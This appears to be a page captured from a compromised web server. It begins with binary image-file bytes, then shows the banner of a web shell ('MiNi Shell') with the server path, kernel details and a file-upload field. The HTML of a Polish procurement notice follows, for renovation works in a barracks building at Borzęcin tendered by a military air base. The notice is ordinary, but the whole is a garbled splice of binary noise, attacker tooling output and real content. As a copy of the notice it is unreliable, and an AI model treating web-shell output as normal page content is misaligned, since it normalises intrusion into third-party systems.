JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210930/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210930/0019728502-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont przegród pomiędzy korytarzem i pomieszczeniami w budynku nr 3 - Koszarowy w K-7212 Borzęcin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">42 Baza Lotnictwa Szkolnego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 7962932928</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sadków 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261511232</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">p.kuras@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://42blsz.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont przegród pomiędzy korytarzem i pomieszczeniami w budynku nr 3 - Koszarowy w K-7212 Borzęcin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-19b96aff-21bd-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00197285</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/42blsz/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie p. z. p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną /Dz. U. z 2020 r. poz. 344/. <br/>2. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują poprzez Platformę zakupową, dostępną pod adresem https://platformazakupowa.pl/pn/42blsz/proceedings, za pośrednictwem komendy „Wyślij wiadomość do Zamawiającego”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p. z. p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach: pdf, doc., docx, rtf, odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale XI ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem kwalifikowanym, podpisem zaufanym lub elektronicznym podpisem osobistym. <br/>2. Komunikacja za pośrednictwem Platformy zakupowej wymaga założenia konta Użytkownika.<br/>3. W celu założenia konta Użytkownika na Platformie Zakupowej, koniecznym jest posiadanie przez użytkownika (Wykonawcę) aktywnego konta poczty elektronicznej (e-mail). Korzystanie z Platformy Zakupowej przez Wykonawcę jest bezpłatnie. <br/>4. Wymagania techniczne i organizacyjne wysyłania oraz odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z platformy zakupowej: https://platformazakupowa.pl/strona/1-regulamin. Wykonawca składając ofertę akceptuje powyższy regulamin.<br/>5.Na stronie platformy zakupowej znajduje się Instrukcja dla Wykonawców zawierającą m.in. informacje dotyczące sposobu składania ofert. <br/>6. Zamawiający w zakresie pytań technicznych związanych z działem platformy zakupowej prosi o kontakt z Centrum Wsparcia Klienta www.platformazakupowa.pl pod numerem +48 22 101 02 02, cwk@platformazakupowa.pl, która udziela wszystkich informacji związanych z procesem składania ofert, rejestracji czy innych aspektów technicznych platformy zakupowej od poniedziałku do piątku od 8:00 do 17:00</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest 42 Baza Lotnictwa Szkolnego w Radomiu z siedzibą w Radomiu przy ul. Sadków 9 nr tel.: 261 511 500;<br/>2)	administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można się kontaktować pod adresem e-mail: e-mail: jw4938@ron.mil.pl<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym.<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania| o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania <br/>nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/>gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>10)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">26/TP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem niniejszej Specyfikacji Technicznej są wymagania dotyczące wykonania i odbioru robót budowlanych związanych z wykonaniem zadania „Remont przegród pomiędzy korytarzem i pomieszczeniami w budynku nr 3 – Koszarowy w K-7212 Borzęcin”.<br/>Roboty budowlane w zakresie przygotowania terenu pod budowę:<br/>- Wykonawca zapewni wygrodzenie terenu oraz jego zabezpieczenie na czas prowadzenia robót budowlanych.<br/>2.	Roboty ogólnobudowlane:<br/>	Zabezpieczenie podłóg folią,<br/>	Rozebranie ścianek działowych z łat i rygli,<br/>	Rozebranie okładzin ścian z płyt ściennych wraz z drzwiczkami od strony pomieszczeń<br/>	Rozszklenie naświetli ścianek działowych ze szkła zbrojonego o ramach drewnianych,<br/>	Wykucie z muru ościeżnic stalowych o powierzchni do 2 m2 - po przeciwnej stronie korytarzy,<br/>	Cięcie piłą diamentową ścian z cegły o grubości ponad 15 do 40 cm - jednostronne poszerzenie otworu drzwiowego,<br/>	Wykucie strzępi w płaszczyźnie ściany z cegieł o grubości 1 ceg. na zaprawie cementowo-wapiennej - poszerzenie otworów drzwiowych,<br/>	Wykucie z muru podokienników drewnianych, oraz z PVC,<br/>	Odbicie tynków wewnętrznych z zaprawy cementowo-wapiennej pasami o szerokości do 30 cm - na styku nowych ścianek,<br/>	Wykucie z muru kratek i krat wentylacyjnych,<br/>	Obsadzenie kratek wentylacyjnych w ścianach z cegieł - kratki stalowe z siatką,<br/>	Izolacje przeciwwilgociowe i przeciwwodne z folii polietylenowej - poziome pod posadzkowe pod ścianki,<br/>	Ścianki działowe z płytek piano- lub gazobetonowych grubości 12 cm,<br/>	Nadproża prefabrykowane typu YTONG,<br/>	Tynki wewnętrzne zwykłe kat. III wykonywane ręcznie na ścianach i słupach - na nowych ściankach działowych,<br/>	Wykonanie tynków zwykłych wewnętrznych kat. III z zaprawy cem.- wap. na ościeżach z cegły, pustaków ceramicznych, betonu o szer. do 15 cm - po drugiej strony korytarza,<br/>	Ościeżnice stalowe dla drzwi wewnątrzlokalowych i wejściowych do lokalu malowane dwukrotnie na budowie typu FD7 o szerokości 90 cm w świetle ościeżnicy,<br/>	Montaż skrzydeł drzwiowych wewnętrznych pełnych fabrycznie wykończonych - z ramiakiem drewnianym,<br/>	Podokienniki i półki o szer. do 40 cm z płyt z konglomeratów kamiennych na spoiwie poliestrowym,<br/>	Rozebranie posadzek z wykładzin z tworzyw sztucznych (płytki) i dywanowe - rulony,<br/>	Przygotowanie podłoża pod wykonanie okładzin podłogowych - oczyszczenie i zmycie podłoża,<br/>	Warstwy wyrównujące i wygładzające z zaprawy samopoziomującej grubości 5 mm,<br/>	Przygotowanie podłoża pod wykonanie okładzin podłogowych - jednokrotne gruntowanie podłoża,<br/>	Posadzki z wykładzin z tworzyw sztucznych bez warstwy izolacyjnej rulonowe, zgrzewane - Tarkett,<br/>	Posadzki z tworzyw sztucznych - listwy przyścienne wys. 10 cm zgrzewane,<br/>	Rozebranie cokolików w korytarzach,<br/>	Ułożenie posadzek z płytek ceramicznych (gresowych) rektyfikowanych satynowych i polerowanych,<br/>	Cokoliki z kształtek z kamieni sztucznych na zaprawie klejowej w korytarzach,<br/>	Malowanie mlekiem wapiennym aparatami z napędem ręcznym tynków gładkich jednokrotnie - tynków na nowych ściankach,<br/>	Dwukrotne malowanie farbami emulsyjnymi powierzchni wewnętrznych - tynków gładkich bez gruntowania - nowych tynków,<br/>	Przygotowanie powierzchni pod malowanie farbami emulsyjnymi starych tynków z poszpachlowaniem nierówności,<br/>	Gruntowanie podłoży preparatami "CERESIT CT 17" i "ATLAS UNI GRUNT" sufitów i ścian,<br/>	Dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych sufitów,<br/>	Dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych ścian,<br/>	Mycie po robotach malarskich okien zespolonych,<br/>	Bezspoinowy system dociepleń Ceresit VWS. Wykonanie ręczne cienkowarstwowej wyprawy z tynku mozaikowego CT 177 Gruntowanie podłoża - pierwsza warstw,<br/>	Bezspoinowy system dociepleń Ceresit VWS. Wykonanie ręczne cienkowarstwowej wyprawy z tynku mozaikowego CT 177 Gruntowanie podłoża - każda następna warstwa,<br/>	Bezspoinowy system dociepleń Ceresit VWS. Wykonanie ręczne cienkowarstwowej wyprawy z tynku mozaikowego CT 177 na gotowym podłożu na ścianach płaskich i powierzchniach poziomych (ziarno 0,8-1,2 mm)<br/>	Mycie po robotach malarskich okien zespolonych,<br/>	Rozebranie ceglanych sklepień odcinkowych o grubości 1/2 cegły na zaprawie cementowe,<br/>	Ułożenie nadproży prefabrykowanych,<br/>	Tynki zewnętrzne zwykłe kat. II na ościeżach o szerokości do 30 cm wykonywane ręcznie,<br/>	Tynki zewnętrzne zwykłe kat. II na ościeżach o szerokości do 15 cm wykonywane ręcznie,<br/>	Rusztowania ramowe warszawskie wielokolumnowe wysokość do 6 m - 6.00 m nad poziomem podłogi parteru,<br/>	Wykucie z muru ościeżnic stalowych - drzwi ewakuacyjne w poziomie piętra,<br/>	Cięcie piłą diamentową ścian z cegły o grubości ponad 15 do 40 cm - jednostronne poszerzenie otworu drzwiowego,<br/>	Wykucie strzępi w przekroju ściany z cegieł o grubości 1 1/2 ceg. na zaprawie cementowo-wapiennej,<br/>	Wykucie gniazd o głębokości 1 ceg. dla belek stalowych w ścianach z cegieł na zaprawie cementowo-wapiennej,<br/>	Otwory w ścianach murowanych - ułożenie nadproży prefabrykowanych L-19,<br/>	Drzwi stalowe zewnętrzne jednoskrzydłowe, częściowo oszklone w klasie min. RC2 malowane proszkowo w kolorze RAL,<br/>	Wykonanie tynków zwykłych wewnętrznych kat. III z zaprawy cem. - wap. na ościeżach z cegły, pustaków ceramicznych, betonu o szer. do 40 cm,<br/>	Ochrona narożników wypukłych przy użyciu profilu narożnikowego,<br/>	Wywiezienie materiałów z rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym na odległość 5 km,<br/>	Utylizacja materiałów z rozbiórki.<br/>2.1. ROBOTY ELEKTRYCZNE:<br/>	Demontaż przewodów wtynkowych z podłoża ceglanego lub betonowego,<br/>	Demontaż opraw świetlówkowych z kloszem,<br/>	Mechaniczne wykucie bruzd dla przewodów wtynkowych na styku elementów betonowych,<br/>	Demontaż łączników instalacyjnych podtynkowych o natężeniu prądu do 10 A,<br/>	Demontaż gniazd wtyczkowych podtynkowych o natężeniu prądu do 63 A,<br/>	Demontaż tablic bezpiecznikowych o powierzchni do 0.5 m2,<br/>	Zaprawianie bruzd o szerokości do 50 mm,<br/>	Przewody kabelkowe o łącznym przekroju żył do 7.5 mm2 układane w gotowych bruzdach na podłożu betonowym,<br/>	Przygotowanie podłoża pod mocowanie osprzętu na zaprawie cementowej lub gipsowej z wykonaniem ślepych otworów mechanicznie w cegle,<br/>	Montaż na gotowym podłożu puszek p.t. bakelitowych o średnicy do 80 mm mocowanych na zaprawę,<br/>	Montaż na gotowym podłożu gniazd i łączników instalacyjnych podtynkowych, w puszce instalacyjnej,<br/>	Montaż na gotowym podłożu opraw świetlówkowych z blachy stalowej z kloszem lub rastrem przykręcanych, końcowych,<br/>	Wymiana tablicy rozdzielczej wraz z osprzętem modułowym,<br/>	Wymiana przewodów kabelkowych płaskich o łącznym przekroju żył powyżej 7.5 mm2 układanych w tynku bez kucia i zaprawiania bruzd na betonie – wlz,<br/>	Sprawdzenie osprzętu i pomiary rezystancji instalacji.<br/>3.	Prace porządkowe:<br/>- uprzątnięcie placu budowy, wywiezienie odpadów metalowych pod nadzorem pracowników RON;<br/>- uprzątnięcie placu budowy, wywiezienie i utylizacja gruzu i innych odpadów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-16</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udziela zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymogom określonym w niniejszej SWZ i zostanie oceniona jako najkorzystniejsza, w oparciu o podane kryteria wyboru oferty: ceny brutto– 60% oraz okres udzielonej gwarancji na przedmiot zamówienia – 40%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia wymagań w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej <br/>lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia wymagań w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia wymagań powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej: <br/>Opis spełnienia warunku:<br/>Wykonawca spełni warunek jeżeli: <br/>a)	przedstawi wykaz wykonanych, a w przypadku świadczeń okresowych <br/>lub ciągłych również wykonywanych głównych robót budowlanych bezpośrednio związanych z przedmiotem zamówienia lub o podobnym charakterze, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem wartości, przedmiotu 